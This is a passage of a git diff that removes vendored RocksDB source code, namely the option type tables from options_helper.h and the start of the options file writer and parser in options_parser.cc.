-      offsetof(struct MutableDBOptions, max_open_files)}},
-    {"table_cache_numshardbits",
-     {offsetof(struct DBOptions, table_cache_numshardbits), OptionType::kInt,
-      OptionVerificationType::kNormal, false, 0}},
-    {"db_write_buffer_size",
-     {offsetof(struct DBOptions, db_write_buffer_size), OptionType::kSizeT,
-      OptionVerificationType::kNormal, false, 0}},
-    {"keep_log_file_num",
-     {offsetof(struct DBOptions, keep_log_file_num), OptionType::kSizeT,
-      OptionVerificationType::kNormal, false, 0}},
-    {"recycle_log_file_num",
-     {offsetof(struct DBOptions, recycle_log_file_num), OptionType::kSizeT,
-      OptionVerificationType::kNormal, false, 0}},
-    {"log_file_time_to_roll",
-     {offsetof(struct DBOptions, log_file_time_to_roll), OptionType::kSizeT,
-      OptionVerificationType::kNormal, false, 0}},
-    {"manifest_preallocation_size",
-     {offsetof(struct DBOptions, manifest_preallocation_size),
-      OptionType::kSizeT, OptionVerificationType::kNormal, false, 0}},
-    {"max_log_file_size",
-     {offsetof(struct DBOptions, max_log_file_size), OptionType::kSizeT,
-      OptionVerificationType::kNormal, false, 0}},
-    {"db_log_dir",
-     {offsetof(struct DBOptions, db_log_dir), OptionType::kString,
-      OptionVerificationType::kNormal, false, 0}},
-    {"wal_dir",
-     {offsetof(struct DBOptions, wal_dir), OptionType::kString,
-      OptionVerificationType::kNormal, false, 0}},
-    {"max_subcompactions",
-     {offsetof(struct DBOptions, max_subcompactions), OptionType::kUInt32T,
-      OptionVerificationType::kNormal, false, 0}},
-    {"WAL_size_limit_MB",
-     {offsetof(struct DBOptions, WAL_size_limit_MB), OptionType::kUInt64T,
-      OptionVerificationType::kNormal, false, 0}},
-    {"WAL_ttl_seconds",
-     {offsetof(struct DBOptions, WAL_ttl_seconds), OptionType::kUInt64T,
-      OptionVerificationType::kNormal, false, 0}},
-    {"bytes_per_sync",
-     {offsetof(struct DBOptions, bytes_per_sync), OptionType::kUInt64T,
-      OptionVerificationType::kNormal, false, 0}},
-    {"delayed_write_rate",
-     {offsetof(struct DBOptions, delayed_write_rate), OptionType::kUInt64T,
-      OptionVerificationType::kNormal, true,
-      offsetof(struct MutableDBOptions, delayed_write_rate)}},
-    {"delete_obsolete_files_period_micros",
-     {offsetof(struct DBOptions, delete_obsolete_files_period_micros),
-      OptionType::kUInt64T, OptionVerificationType::kNormal, true,
-      offsetof(struct MutableDBOptions, delete_obsolete_files_period_micros)}},
-    {"max_manifest_file_size",
-     {offsetof(struct DBOptions, max_manifest_file_size), OptionType::kUInt64T,
-      OptionVerificationType::kNormal, false, 0}},
-    {"max_total_wal_size",
-     {offsetof(struct DBOptions, max_total_wal_size), OptionType::kUInt64T,
-      OptionVerificationType::kNormal, true,
-      offsetof(struct MutableDBOptions, max_total_wal_size)}},
-    {"wal_bytes_per_sync",
-     {offsetof(struct DBOptions, wal_bytes_per_sync), OptionType::kUInt64T,
-      OptionVerificationType::kNormal, false, 0}},
-    {"stats_dump_period_sec",
-     {offsetof(struct DBOptions, stats_dump_period_sec), OptionType::kUInt,
-      OptionVerificationType::kNormal, true,
-      offsetof(struct MutableDBOptions, stats_dump_period_sec)}},
-    {"fail_if_options_file_error",
-     {offsetof(struct DBOptions, fail_if_options_file_error),
-      OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}},
-    {"enable_pipelined_write",
-     {offsetof(struct DBOptions, enable_pipelined_write), OptionType::kBoolean,
-      OptionVerificationType::kNormal, false, 0}},
-    {"allow_concurrent_memtable_write",
-     {offsetof(struct DBOptions, allow_concurrent_memtable_write),
-      OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}},
-    {"wal_recovery_mode",
-     {offsetof(struct DBOptions, wal_recovery_mode),
-      OptionType::kWALRecoveryMode, OptionVerificationType::kNormal, false, 0}},
-    {"enable_write_thread_adaptive_yield",
-     {offsetof(struct DBOptions, enable_write_thread_adaptive_yield),
-      OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}},
-    {"write_thread_slow_yield_usec",
-     {offsetof(struct DBOptions, write_thread_slow_yield_usec),
-      OptionType::kUInt64T, OptionVerificationType::kNormal, false, 0}},
-    {"write_thread_max_yield_usec",
-     {offsetof(struct DBOptions, write_thread_max_yield_usec),
-      OptionType::kUInt64T, OptionVerificationType::kNormal, false, 0}},
-    {"access_hint_on_compaction_start",
-     {offsetof(struct DBOptions, access_hint_on_compaction_start),
-      OptionType::kAccessHint, OptionVerificationType::kNormal, false, 0}},
-    {"info_log_level",
-     {offsetof(struct DBOptions, info_log_level), OptionType::kInfoLogLevel,
-      OptionVerificationType::kNormal, false, 0}},
-    {"dump_malloc_stats",
-     {offsetof(struct DBOptions, dump_malloc_stats), OptionType::kBoolean,
-      OptionVerificationType::kNormal, false, 0}},
-    {"avoid_flush_during_recovery",
-     {offsetof(struct DBOptions, avoid_flush_during_recovery),
-      OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}},
-    {"avoid_flush_during_shutdown",
-     {offsetof(struct DBOptions, avoid_flush_during_shutdown),
-      OptionType::kBoolean, OptionVerificationType::kNormal, true,
-      offsetof(struct MutableDBOptions, avoid_flush_during_shutdown)}},
-    {"allow_ingest_behind",
-     {offsetof(struct DBOptions, allow_ingest_behind), OptionType::kBoolean,
-      OptionVerificationType::kNormal, false,
-      offsetof(struct ImmutableDBOptions, allow_ingest_behind)}},
-    {"concurrent_prepare",
-     {offsetof(struct DBOptions, concurrent_prepare), OptionType::kBoolean,
-      OptionVerificationType::kNormal, false,
-      offsetof(struct ImmutableDBOptions, concurrent_prepare)}},
-    {"manual_wal_flush",
-     {offsetof(struct DBOptions, manual_wal_flush), OptionType::kBoolean,
-      OptionVerificationType::kNormal, false,
-      offsetof(struct ImmutableDBOptions, manual_wal_flush)}}};
-
-// offset_of is used to get the offset of a class data member
-// ex: offset_of(&ColumnFamilyOptions::num_levels)
-// This call will return the offset of num_levels in ColumnFamilyOptions class
-//
-// This is the same as offsetof() but allow us to work with non standard-layout
-// classes and structures
-// refs:
-// http://en.cppreference.com/w/cpp/concept/StandardLayoutType
-// https://gist.github.com/graphitemaster/494f21190bb2c63c5516
-template <typename T1, typename T2>
-inline int offset_of(T1 T2::*member) {
-  static T2 obj;
-  return int(size_t(&(obj.*member)) - size_t(&obj));
-}
-
-static std::unordered_map<std::string, OptionTypeInfo> cf_options_type_info = {
-    /* not yet supported
-    CompactionOptionsFIFO compaction_options_fifo;
-    CompactionOptionsUniversal compaction_options_universal;
-    CompressionOptions compression_opts;
-    TablePropertiesCollectorFactories table_properties_collector_factories;
-    typedef std::vector<std::shared_ptr<TablePropertiesCollectorFactory>>
-        TablePropertiesCollectorFactories;
-    UpdateStatus (*inplace_callback)(char* existing_value,
-                                     uint34_t* existing_value_size,
-                                     Slice delta_value,
-                                     std::string* merged_value);
-     */
-    {"report_bg_io_stats",
-     {offset_of(&ColumnFamilyOptions::report_bg_io_stats), OptionType::kBoolean,
-      OptionVerificationType::kNormal, true,
-      offsetof(struct MutableCFOptions, report_bg_io_stats)}},
-    {"compaction_measure_io_stats",
-     {0, OptionType::kBoolean, OptionVerificationType::kDeprecated, false, 0}},
-    {"disable_auto_compactions",
-     {offset_of(&ColumnFamilyOptions::disable_auto_compactions),
-      OptionType::kBoolean, OptionVerificationType::kNormal, true,
-      offsetof(struct MutableCFOptions, disable_auto_compactions)}},
-    {"filter_deletes",
-     {0, OptionType::kBoolean, OptionVerificationType::kDeprecated, true, 0}},
-    {"inplace_update_support",
-     {offset_of(&ColumnFamilyOptions::inplace_update_support),
-      OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}},
-    {"level_compaction_dynamic_level_bytes",
-     {offset_of(&ColumnFamilyOptions::level_compaction_dynamic_level_bytes),
-      OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}},
-    {"optimize_filters_for_hits",
-     {offset_of(&ColumnFamilyOptions::optimize_filters_for_hits),
-      OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}},
-    {"paranoid_file_checks",
-     {offset_of(&ColumnFamilyOptions::paranoid_file_checks),
-      OptionType::kBoolean, OptionVerificationType::kNormal, true,
-      offsetof(struct MutableCFOptions, paranoid_file_checks)}},
-    {"force_consistency_checks",
-     {offset_of(&ColumnFamilyOptions::force_consistency_checks),
-      OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}},
-    {"purge_redundant_kvs_while_flush",
-     {offset_of(&ColumnFamilyOptions::purge_redundant_kvs_while_flush),
-      OptionType::kBoolean, OptionVerificationType::kNormal, false, 0}},
-    {"verify_checksums_in_compaction",
-     {0, OptionType::kBoolean, OptionVerificationType::kDeprecated, true, 0}},
-    {"soft_pending_compaction_bytes_limit",
-     {offset_of(&ColumnFamilyOptions::soft_pending_compaction_bytes_limit),
-      OptionType::kUInt64T, OptionVerificationType::kNormal, true,
-      offsetof(struct MutableCFOptions, soft_pending_compaction_bytes_limit)}},
-    {"hard_pending_compaction_bytes_limit",
-     {offset_of(&ColumnFamilyOptions::hard_pending_compaction_bytes_limit),
-      OptionType::kUInt64T, OptionVerificationType::kNormal, true,
-      offsetof(struct MutableCFOptions, hard_pending_compaction_bytes_limit)}},
-    {"hard_rate_limit",
-     {0, OptionType::kDouble, OptionVerificationType::kDeprecated, true, 0}},
-    {"soft_rate_limit",
-     {0, OptionType::kDouble, OptionVerificationType::kDeprecated, true, 0}},
-    {"max_compaction_bytes",
-     {offset_of(&ColumnFamilyOptions::max_compaction_bytes),
-      OptionType::kUInt64T, OptionVerificationType::kNormal, true,
-      offsetof(struct MutableCFOptions, max_compaction_bytes)}},
-    {"expanded_compaction_factor",
-     {0, OptionType::kInt, OptionVerificationType::kDeprecated, true, 0}},
-    {"level0_file_num_compaction_trigger",
-     {offset_of(&ColumnFamilyOptions::level0_file_num_compaction_trigger),
-      OptionType::kInt, OptionVerificationType::kNormal, true,
-      offsetof(struct MutableCFOptions, level0_file_num_compaction_trigger)}},
-    {"level0_slowdown_writes_trigger",
-     {offset_of(&ColumnFamilyOptions::level0_slowdown_writes_trigger),
-      OptionType::kInt, OptionVerificationType::kNormal, true,
-      offsetof(struct MutableCFOptions, level0_slowdown_writes_trigger)}},
-    {"level0_stop_writes_trigger",
-     {offset_of(&ColumnFamilyOptions::level0_stop_writes_trigger),
-      OptionType::kInt, OptionVerificationType::kNormal, true,
-      offsetof(struct MutableCFOptions, level0_stop_writes_trigger)}},
-    {"max_grandparent_overlap_factor",
-     {0, OptionType::kInt, OptionVerificationType::kDeprecated, true, 0}},
-    {"max_mem_compaction_level",
-     {0, OptionType::kInt, OptionVerificationType::kDeprecated, false, 0}},
-    {"max_write_buffer_number",
-     {offset_of(&ColumnFamilyOptions::max_write_buffer_number),
-      OptionType::kInt, OptionVerificationType::kNormal, true,
-      offsetof(struct MutableCFOptions, max_write_buffer_number)}},
-    {"max_write_buffer_number_to_maintain",
-     {offset_of(&ColumnFamilyOptions::max_write_buffer_number_to_maintain),
-      OptionType::kInt, OptionVerificationType::kNormal, false, 0}},
-    {"min_write_buffer_number_to_merge",
-     {offset_of(&ColumnFamilyOptions::min_write_buffer_number_to_merge),
-      OptionType::kInt, OptionVerificationType::kNormal, false, 0}},
-    {"num_levels",
-     {offset_of(&ColumnFamilyOptions::num_levels), OptionType::kInt,
-      OptionVerificationType::kNormal, false, 0}},
-    {"source_compaction_factor",
-     {0, OptionType::kInt, OptionVerificationType::kDeprecated, true, 0}},
-    {"target_file_size_multiplier",
-     {offset_of(&ColumnFamilyOptions::target_file_size_multiplier),
-      OptionType::kInt, OptionVerificationType::kNormal, true,
-      offsetof(struct MutableCFOptions, target_file_size_multiplier)}},
-    {"arena_block_size",
-     {offset_of(&ColumnFamilyOptions::arena_block_size), OptionType::kSizeT,
-      OptionVerificationType::kNormal, true,
-      offsetof(struct MutableCFOptions, arena_block_size)}},
-    {"inplace_update_num_locks",
-     {offset_of(&ColumnFamilyOptions::inplace_update_num_locks),
-      OptionType::kSizeT, OptionVerificationType::kNormal, true,
-      offsetof(struct MutableCFOptions, inplace_update_num_locks)}},
-    {"max_successive_merges",
-     {offset_of(&ColumnFamilyOptions::max_successive_merges),
-      OptionType::kSizeT, OptionVerificationType::kNormal, true,
-      offsetof(struct MutableCFOptions, max_successive_merges)}},
-    {"memtable_huge_page_size",
-     {offset_of(&ColumnFamilyOptions::memtable_huge_page_size),
-      OptionType::kSizeT, OptionVerificationType::kNormal, true,
-      offsetof(struct MutableCFOptions, memtable_huge_page_size)}},
-    {"memtable_prefix_bloom_huge_page_tlb_size",
-     {0, OptionType::kSizeT, OptionVerificationType::kDeprecated, true, 0}},
-    {"write_buffer_size",
-     {offset_of(&ColumnFamilyOptions::write_buffer_size), OptionType::kSizeT,
-      OptionVerificationType::kNormal, true,
-      offsetof(struct MutableCFOptions, write_buffer_size)}},
-    {"bloom_locality",
-     {offset_of(&ColumnFamilyOptions::bloom_locality), OptionType::kUInt32T,
-      OptionVerificationType::kNormal, false, 0}},
-    {"memtable_prefix_bloom_bits",
-     {0, OptionType::kUInt32T, OptionVerificationType::kDeprecated, true, 0}},
-    {"memtable_prefix_bloom_size_ratio",
-     {offset_of(&ColumnFamilyOptions::memtable_prefix_bloom_size_ratio),
-      OptionType::kDouble, OptionVerificationType::kNormal, true,
-      offsetof(struct MutableCFOptions, memtable_prefix_bloom_size_ratio)}},
-    {"memtable_prefix_bloom_probes",
-     {0, OptionType::kUInt32T, OptionVerificationType::kDeprecated, true, 0}},
-    {"min_partial_merge_operands",
-     {0, OptionType::kUInt32T, OptionVerificationType::kDeprecated, true, 0}},
-    {"max_bytes_for_level_base",
-     {offset_of(&ColumnFamilyOptions::max_bytes_for_level_base),
-      OptionType::kUInt64T, OptionVerificationType::kNormal, true,
-      offsetof(struct MutableCFOptions, max_bytes_for_level_base)}},
-    {"max_bytes_for_level_multiplier",
-     {offset_of(&ColumnFamilyOptions::max_bytes_for_level_multiplier),
-      OptionType::kDouble, OptionVerificationType::kNormal, true,
-      offsetof(struct MutableCFOptions, max_bytes_for_level_multiplier)}},
-    {"max_bytes_for_level_multiplier_additional",
-     {offset_of(
-          &ColumnFamilyOptions::max_bytes_for_level_multiplier_additional),
-      OptionType::kVectorInt, OptionVerificationType::kNormal, true,
-      offsetof(struct MutableCFOptions,
-               max_bytes_for_level_multiplier_additional)}},
-    {"max_sequential_skip_in_iterations",
-     {offset_of(&ColumnFamilyOptions::max_sequential_skip_in_iterations),
-      OptionType::kUInt64T, OptionVerificationType::kNormal, true,
-      offsetof(struct MutableCFOptions, max_sequential_skip_in_iterations)}},
-    {"target_file_size_base",
-     {offset_of(&ColumnFamilyOptions::target_file_size_base),
-      OptionType::kUInt64T, OptionVerificationType::kNormal, true,
-      offsetof(struct MutableCFOptions, target_file_size_base)}},
-    {"rate_limit_delay_max_milliseconds",
-     {0, OptionType::kUInt, OptionVerificationType::kDeprecated, false, 0}},
-    {"compression",
-     {offset_of(&ColumnFamilyOptions::compression),
-      OptionType::kCompressionType, OptionVerificationType::kNormal, true,
-      offsetof(struct MutableCFOptions, compression)}},
-    {"compression_per_level",
-     {offset_of(&ColumnFamilyOptions::compression_per_level),
-      OptionType::kVectorCompressionType, OptionVerificationType::kNormal,
-      false, 0}},
-    {"bottommost_compression",
-     {offset_of(&ColumnFamilyOptions::bottommost_compression),
-      OptionType::kCompressionType, OptionVerificationType::kNormal, false, 0}},
-    {"comparator",
-     {offset_of(&ColumnFamilyOptions::comparator), OptionType::kComparator,
-      OptionVerificationType::kByName, false, 0}},
-    {"prefix_extractor",
-     {offset_of(&ColumnFamilyOptions::prefix_extractor),
-      OptionType::kSliceTransform, OptionVerificationType::kByNameAllowNull,
-      false, 0}},
-    {"memtable_insert_with_hint_prefix_extractor",
-     {offset_of(
-          &ColumnFamilyOptions::memtable_insert_with_hint_prefix_extractor),
-      OptionType::kSliceTransform, OptionVerificationType::kByNameAllowNull,
-      false, 0}},
-    {"memtable_factory",
-     {offset_of(&ColumnFamilyOptions::memtable_factory),
-      OptionType::kMemTableRepFactory, OptionVerificationType::kByName, false,
-      0}},
-    {"table_factory",
-     {offset_of(&ColumnFamilyOptions::table_factory), OptionType::kTableFactory,
-      OptionVerificationType::kByName, false, 0}},
-    {"compaction_filter",
-     {offset_of(&ColumnFamilyOptions::compaction_filter),
-      OptionType::kCompactionFilter, OptionVerificationType::kByName, false,
-      0}},
-    {"compaction_filter_factory",
-     {offset_of(&ColumnFamilyOptions::compaction_filter_factory),
-      OptionType::kCompactionFilterFactory, OptionVerificationType::kByName,
-      false, 0}},
-    {"merge_operator",
-     {offset_of(&ColumnFamilyOptions::merge_operator),
-      OptionType::kMergeOperator, OptionVerificationType::kByName, false, 0}},
-    {"compaction_style",
-     {offset_of(&ColumnFamilyOptions::compaction_style),
-      OptionType::kCompactionStyle, OptionVerificationType::kNormal, false, 0}},
-    {"compaction_pri",
-     {offset_of(&ColumnFamilyOptions::compaction_pri),
-      OptionType::kCompactionPri, OptionVerificationType::kNormal, false, 0}}};
-
-static std::unordered_map<std::string, CompressionType>
-    compression_type_string_map = {
-        {"kNoCompression", kNoCompression},
-        {"kSnappyCompression", kSnappyCompression},
-        {"kZlibCompression", kZlibCompression},
-        {"kBZip2Compression", kBZip2Compression},
-        {"kLZ4Compression", kLZ4Compression},
-        {"kLZ4HCCompression", kLZ4HCCompression},
-        {"kXpressCompression", kXpressCompression},
-        {"kZSTD", kZSTD},
-        {"kZSTDNotFinalCompression", kZSTDNotFinalCompression},
-        {"kDisableCompressionOption", kDisableCompressionOption}};
-
-static std::unordered_map<std::string, BlockBasedTableOptions::IndexType>
-    block_base_table_index_type_string_map = {
-        {"kBinarySearch", BlockBasedTableOptions::IndexType::kBinarySearch},
-        {"kHashSearch", BlockBasedTableOptions::IndexType::kHashSearch},
-        {"kTwoLevelIndexSearch",
-         BlockBasedTableOptions::IndexType::kTwoLevelIndexSearch}};
-
-static std::unordered_map<std::string, EncodingType> encoding_type_string_map =
-    {{"kPlain", kPlain}, {"kPrefix", kPrefix}};
-
-static std::unordered_map<std::string, CompactionStyle>
-    compaction_style_string_map = {
-        {"kCompactionStyleLevel", kCompactionStyleLevel},
-        {"kCompactionStyleUniversal", kCompactionStyleUniversal},
-        {"kCompactionStyleFIFO", kCompactionStyleFIFO},
-        {"kCompactionStyleNone", kCompactionStyleNone}};
-
-static std::unordered_map<std::string, CompactionPri>
-    compaction_pri_string_map = {
-        {"kByCompensatedSize", kByCompensatedSize},
-        {"kOldestLargestSeqFirst", kOldestLargestSeqFirst},
-        {"kOldestSmallestSeqFirst", kOldestSmallestSeqFirst},
-        {"kMinOverlappingRatio", kMinOverlappingRatio}};
-
-static std::unordered_map<std::string,
-                          WALRecoveryMode> wal_recovery_mode_string_map = {
-    {"kTolerateCorruptedTailRecords",
-     WALRecoveryMode::kTolerateCorruptedTailRecords},
-    {"kAbsoluteConsistency", WALRecoveryMode::kAbsoluteConsistency},
-    {"kPointInTimeRecovery", WALRecoveryMode::kPointInTimeRecovery},
-    {"kSkipAnyCorruptedRecords", WALRecoveryMode::kSkipAnyCorruptedRecords}};
-
-static std::unordered_map<std::string, DBOptions::AccessHint>
-    access_hint_string_map = {{"NONE", DBOptions::AccessHint::NONE},
-                              {"NORMAL", DBOptions::AccessHint::NORMAL},
-                              {"SEQUENTIAL", DBOptions::AccessHint::SEQUENTIAL},
-                              {"WILLNEED", DBOptions::AccessHint::WILLNEED}};
-
-static std::unordered_map<std::string, InfoLogLevel> info_log_level_string_map =
-    {{"DEBUG_LEVEL", InfoLogLevel::DEBUG_LEVEL},
-     {"INFO_LEVEL", InfoLogLevel::INFO_LEVEL},
-     {"WARN_LEVEL", InfoLogLevel::WARN_LEVEL},
-     {"ERROR_LEVEL", InfoLogLevel::ERROR_LEVEL},
-     {"FATAL_LEVEL", InfoLogLevel::FATAL_LEVEL},
-     {"HEADER_LEVEL", InfoLogLevel::HEADER_LEVEL}};
-
-extern Status StringToMap(
-    const std::string& opts_str,
-    std::unordered_map<std::string, std::string>* opts_map);
-
-extern bool ParseOptionHelper(char* opt_address, const OptionType& opt_type,
-                              const std::string& value);
-#endif  // !ROCKSDB_LITE
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/options/options_parser.cc b/thirdparty/rocksdb/options/options_parser.cc
deleted file mode 100644
index 2cb60a0..0000000
--- a/thirdparty/rocksdb/options/options_parser.cc
+++ /dev/null
@@ -1,792 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "options/options_parser.h"
-
-#include <cmath>
-#include <map>
-#include <string>
-#include <utility>
-#include <vector>
-
-#include "options/options_helper.h"
-#include "rocksdb/convenience.h"
-#include "rocksdb/db.h"
-#include "util/cast_util.h"
-#include "util/string_util.h"
-#include "util/sync_point.h"
-
-#include "port/port.h"
-
-namespace rocksdb {
-
-static const std::string option_file_header =
-    "# This is a RocksDB option file.\n"
-    "#\n"
-    "# For detailed file format spec, please refer to the example file\n"
-    "# in examples/rocksdb_option_file_example.ini\n"
-    "#\n"
-    "\n";
-
-Status PersistRocksDBOptions(const DBOptions& db_opt,
-                             const std::vector<std::string>& cf_names,
-                             const std::vector<ColumnFamilyOptions>& cf_opts,
-                             const std::string& file_name, Env* env) {
-  TEST_SYNC_POINT("PersistRocksDBOptions:start");
-  if (cf_names.size() != cf_opts.size()) {
-    return Status::InvalidArgument(
-        "cf_names.size() and cf_opts.size() must be the same");
-  }
-  std::unique_ptr<WritableFile> writable;
-
-  Status s = env->NewWritableFile(file_name, &writable, EnvOptions());
-  if (!s.ok()) {
-    return s;
-  }
-  std::string options_file_content;
-
-  writable->Append(option_file_header + "[" +
-                   opt_section_titles[kOptionSectionVersion] +
-                   "]\n"
-                   "  rocksdb_version=" +
-                   ToString(ROCKSDB_MAJOR) + "." + ToString(ROCKSDB_MINOR) +
-                   "." + ToString(ROCKSDB_PATCH) + "\n");
-  writable->Append("  options_file_version=" +
-                   ToString(ROCKSDB_OPTION_FILE_MAJOR) + "." +
-                   ToString(ROCKSDB_OPTION_FILE_MINOR) + "\n");
-  writable->Append("\n[" + opt_section_titles[kOptionSectionDBOptions] +
-                   "]\n  ");
-
-  s = GetStringFromDBOptions(&options_file_content, db_opt, "\n  ");
-  if (!s.ok()) {
-    writable->Close();
-    return s;
-  }
-  writable->Append(options_file_content + "\n");
-
-  for (size_t i = 0; i < cf_opts.size(); ++i) {
-    // CFOptions section
-    writable->Append("\n[" + opt_section_titles[kOptionSectionCFOptions] +
-                     " \"" + EscapeOptionString(cf_names[i]) + "\"]\n  ");
-    s = GetStringFromColumnFamilyOptions(&options_file_content, cf_opts[i],
-                                         "\n  ");
-    if (!s.ok()) {
-      writable->Close();
-      return s;
-    }
-    writable->Append(options_file_content + "\n");
-    // TableOptions section
-    auto* tf = cf_opts[i].table_factory.get();
-    if (tf != nullptr) {
-      writable->Append("[" + opt_section_titles[kOptionSectionTableOptions] +
-                       tf->Name() + " \"" + EscapeOptionString(cf_names[i]) +
-                       "\"]\n  ");
-      options_file_content.clear();
-      s = tf->GetOptionString(&options_file_content, "\n  ");
-      if (!s.ok()) {
-        return s;
-      }
-      writable->Append(options_file_content + "\n");
-    }
-  }
-  writable->Flush();
-  writable->Fsync();
-  writable->Close();
-
-  return RocksDBOptionsParser::VerifyRocksDBOptionsFromFile(
-      db_opt, cf_names, cf_opts, file_name, env);
-}
-
-RocksDBOptionsParser::RocksDBOptionsParser() { Reset(); }
-
-void RocksDBOptionsParser::Reset() {
-  db_opt_ = DBOptions();
-  db_opt_map_.clear();
-  cf_names_.clear();
-  cf_opts_.clear();
-  cf_opt_maps_.clear();
-  has_version_section_ = false;
-  has_db_options_ = false;
-  has_default_cf_options_ = false;
-  for (int i = 0; i < 3; ++i) {
-    db_version[i] = 0;
-    opt_file_version[i] = 0;
-  }
-}
-
-bool RocksDBOptionsParser::IsSection(const std::string& line) {
-  if (line.size() < 2) {
-    return false;
-  }
-  if (line[0] != '[' || line[line.size() - 1] != ']') {
-    return false;
-  }
-  return true;
-}
-
-Status RocksDBOptionsParser::ParseSection(OptionSection* section,
-                                          std::string* title,
-                                          std::string* argument,
-                                          const std::string& line,
-                                          const int line_num) {
-  *section = kOptionSectionUnknown;
-  // A section is of the form [<SectionName> "<SectionArg>"], where
-  // "<SectionArg>" is optional.
-  size_t arg_start_pos = line.find("\"");
-  size_t arg_end_pos = line.rfind("\"");
-  // The following if-then check tries to identify whether the input
-  // section has the optional section argument.
-  if (arg_start_pos != std::string::npos && arg_start_pos != arg_end_pos) {
-    *title = TrimAndRemoveComment(line.substr(1, arg_start_pos - 1), true);
-    *argument = UnescapeOptionString(
-        line.substr(arg_start_pos + 1, arg_end_pos - arg_start_pos - 1));
-  } else {
-    *title = TrimAndRemoveComment(line.substr(1, line.size() - 2), true);
-    *argument = "";
-  }
-  for (int i = 0; i < kOptionSectionUnknown; ++i) {
-    if (title->find(opt_section_titles[i]) == 0) {
-      if (i == kOptionSectionVersion || i == kOptionSectionDBOptions ||
-          i == kOptionSectionCFOptions) {
-        if (title->size() == opt_section_titles[i].size()) {
-          // if true, then it indicats equal
-          *section = static_cast<OptionSection>(i);
-          return CheckSection(*section, *argument, line_num);
-        }
-      } else if (i == kOptionSectionTableOptions) {
-        // This type of sections has a sufffix at the end of the
-        // section title
-        if (title->size() > opt_section_titles[i].size()) {
-          *section = static_cast<OptionSection>(i);
-          return CheckSection(*section, *argument, line_num);
-        }
-      }
-    }
-  }
-  return Status::InvalidArgument(std::string("Unknown section ") + line);
-}
-
-Status RocksDBOptionsParser::InvalidArgument(const int line_num,
-                                             const std::string& message) {
-  return Status::InvalidArgument(
-      "[RocksDBOptionsParser Error] ",
-      message + " (at line " + ToString(line_num) + ")");
-}
-
-Status RocksDBOptionsParser::ParseStatement(std::string* name,
-                                            std::string* value,
-                                            const std::string& line,
-                                            const int line_num) {
-  size_t eq_pos = line.find("=");
-  if (eq_pos == std::string::npos) {
-    return InvalidArgument(line_num, "A valid statement must have a '='.");
-  }
-
-  *name = TrimAndRemoveComment(line.substr(0, eq_pos), true);
-  *value =
-      TrimAndRemoveComment(line.substr(eq_pos + 1, line.size() - eq_pos - 1));
-  if (name->empty()) {
-    return InvalidArgument(line_num,
-                           "A valid statement must have a variable name.");
-  }
-  return Status::OK();
-}
-
-namespace {
-bool ReadOneLine(std::istringstream* iss, SequentialFile* seq_file,
-                 std::string* output, bool* has_data, Status* result) {
-  const int kBufferSize = 4096;
-  char buffer[kBufferSize + 1];
-  Slice input_slice;
-
-  std::string line;
-  bool has_complete_line = false;
-  while (!has_complete_line) {
-    if (std::getline(*iss, line)) {
-      has_complete_line = !iss->eof();
-    } else {
-      has_complete_line = false;
-    }
-    if (!has_complete_line) {
-      // if we're not sure whether we have a complete line,
-      // further read from the file.
-      if (*has_data) {
-        *result = seq_file->Read(kBufferSize, &input_slice, buffer);
-      }
-      if (input_slice.size() == 0) {
-        // meaning we have read all the data
-        *has_data = false;
-        break;
-      } else {
-        iss->str(line + input_slice.ToString());
-        // reset the internal state of iss so that we can keep reading it.
-        iss->clear();
-        *has_data = (input_slice.size() == kBufferSize);
-        continue;
-      }
-    }
-  }
-  *output = line;
-  return *has_data || has_complete_line;
-}
-}  // namespace
-
-Status RocksDBOptionsParser::Parse(const std::string& file_name, Env* env,
-                                   bool ignore_unknown_options) {
-  Reset();
-
-  std::unique_ptr<SequentialFile> seq_file;
-  Status s = env->NewSequentialFile(file_name, &seq_file, EnvOptions());
-  if (!s.ok()) {
-    return s;
-  }
-
-  OptionSection section = kOptionSectionUnknown;
-  std::string title;
-  std::string argument;
-  std::unordered_map<std::string, std::string> opt_map;
-  std::istringstream iss;
-  std::string line;
-  bool has_data = true;
-  // we only support single-lined statement.
-  for (int line_num = 1;
-       ReadOneLine(&iss, seq_file.get(), &line, &has_data, &s); ++line_num) {
-    if (!s.ok()) {
-      return s;
-    }
-    line = TrimAndRemoveComment(line);
-    if (line.empty()) {
-      continue;
-    }
-    if (IsSection(line)) {
-      s = EndSection(section, title, argument, opt_map, ignore_unknown_options);
-      opt_map.clear();
-      if (!s.ok()) {
-        return s;
-      }
-      s = ParseSection(&section, &title, &argument, line, line_num);
-      if (!s.ok()) {
-        return s;
-      }
-    } else {
-      std::string name;
-      std::string value;
-      s = ParseStatement(&name, &value, line, line_num);
-      if (!s.ok()) {
-        return s;
-      }
-      opt_map.insert({name, value});
-    }
-  }
-
-  s = EndSection(section, title, argument, opt_map, ignore_unknown_options);
-  opt_map.clear();
-  if (!s.ok()) {
-    return s;
-  }
-  return ValidityCheck();
-}
-
-Status RocksDBOptionsParser::CheckSection(const OptionSection section,
-                                          const std::string& section_arg,
-                                          const int line_num) {
-  if (section == kOptionSectionDBOptions) {
-    if (has_db_options_) {
-      return InvalidArgument(
-          line_num,
-          "More than one DBOption section found in the option config file");
-    }
-    has_db_options_ = true;
-  } else if (section == kOptionSectionCFOptions) {
-    bool is_default_cf = (section_arg == kDefaultColumnFamilyName);
-    if (cf_opts_.size() == 0 && !is_default_cf) {
-      return InvalidArgument(
-          line_num,
-          "Default column family must be the first CFOptions section "
-          "in the option config file");
-    } else if (cf_opts_.size() != 0 && is_default_cf) {
-      return InvalidArgument(
-          line_num,
-          "Default column family must be the first CFOptions section "
-          "in the optio/n config file");
-    } else if (GetCFOptions(section_arg) != nullptr) {
-      return InvalidArgument(
-          line_num,
-          "Two identical column families found in option config file");
-    }
-    has_default_cf_options_ |= is_default_cf;
-  } else if (section == kOptionSectionTableOptions) {
-    if (GetCFOptions(section_arg) == nullptr) {
-      return InvalidArgument(
